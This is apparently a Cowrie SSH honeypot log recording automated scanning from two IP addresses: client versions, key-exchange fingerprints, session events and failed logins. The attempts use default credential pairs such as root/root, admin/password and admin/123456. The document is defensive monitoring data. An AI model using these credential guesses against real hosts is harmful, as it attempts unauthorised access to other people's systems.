{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:41.324242Z","src_ip":"212.227.235.229","session":"711815e80838"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-28T07:59:45.296628Z","src_ip":"212.227.235.229","session":"13c4359398b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37050,"dst_ip":"1.2.3.4","dst_port":22,"session":"effbb9a75020","protocol":"ssh","message":"New connection: 212.227.235.229:37050 (1.2.3.4:22) [session: effbb9a75020]","sensor":"my-vps","timestamp":"2025-08-28T07:59:50.183975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:50.199478Z","src_ip":"212.227.235.229","session":"effbb9a75020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37052,"dst_ip":"1.2.3.4","dst_port":22,"session":"cae26c403e04","protocol":"ssh","message":"New connection: 212.227.235.229:37052 (1.2.3.4:22) [session: cae26c403e04]","sensor":"my-vps","timestamp":"2025-08-28T07:59:51.716893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:51.717603Z","src_ip":"212.227.235.229","session":"cae26c403e04"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:51.772029Z","src_ip":"212.227.235.229","session":"d10ad1b13232"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":29148,"dst_ip":"1.2.3.4","dst_port":22,"session":"22a19e8adf03","protocol":"ssh","message":"New connection: 80.94.95.15:29148 (1.2.3.4:22) [session: 22a19e8adf03]","sensor":"my-vps","timestamp":"2025-08-28T07:59:54.151381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:54.152343Z","src_ip":"80.94.95.15","session":"22a19e8adf03"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:59:54.204504Z","src_ip":"80.94.95.15","session":"22a19e8adf03"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T07:59:54.494754Z","src_ip":"80.94.95.15","session":"22a19e8adf03"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:55.189851Z","src_ip":"212.227.235.229","session":"cae26c403e04"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T07:59:55.251300Z","src_ip":"212.227.235.229","session":"711815e80838"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:55.550181Z","src_ip":"80.94.95.15","session":"22a19e8adf03"}
{"eventid":"cowrie.session.closed","duration":"16.5","message":"Connection lost after 16.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:56.525516Z","src_ip":"212.227.235.229","session":"711815e80838"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T07:59:59.324963Z","src_ip":"212.227.235.229","session":"cae26c403e04"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:01.637023Z","src_ip":"212.227.235.229","session":"cae26c403e04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42726,"dst_ip":"1.2.3.4","dst_port":22,"session":"93b16958e200","protocol":"ssh","message":"New connection: 212.227.235.229:42726 (1.2.3.4:22) [session: 93b16958e200]","sensor":"my-vps","timestamp":"2025-08-28T08:00:06.030598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:06.032001Z","src_ip":"212.227.235.229","session":"93b16958e200"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:06.336562Z","src_ip":"212.227.235.229","session":"93b16958e200"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42728,"dst_ip":"1.2.3.4","dst_port":22,"session":"dceca0ec301e","protocol":"ssh","message":"New connection: 212.227.235.229:42728 (1.2.3.4:22) [session: dceca0ec301e]","sensor":"my-vps","timestamp":"2025-08-28T08:00:07.347084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:07.591780Z","src_ip":"212.227.235.229","session":"dceca0ec301e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47344,"dst_ip":"1.2.3.4","dst_port":22,"session":"d96063cfc4ff","protocol":"ssh","message":"New connection: 212.227.235.229:47344 (1.2.3.4:22) [session: d96063cfc4ff]","sensor":"my-vps","timestamp":"2025-08-28T08:00:07.861954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:00:07.863323Z","src_ip":"212.227.235.229","session":"d96063cfc4ff"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:09.879081Z","src_ip":"212.227.235.229","session":"d96063cfc4ff"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:00:10.672244Z","src_ip":"212.227.235.229","session":"93b16958e200"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:00:11.940806Z","src_ip":"212.227.235.229","session":"93b16958e200"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:00:12.078145Z","src_ip":"212.227.235.229","session":"dceca0ec301e"}
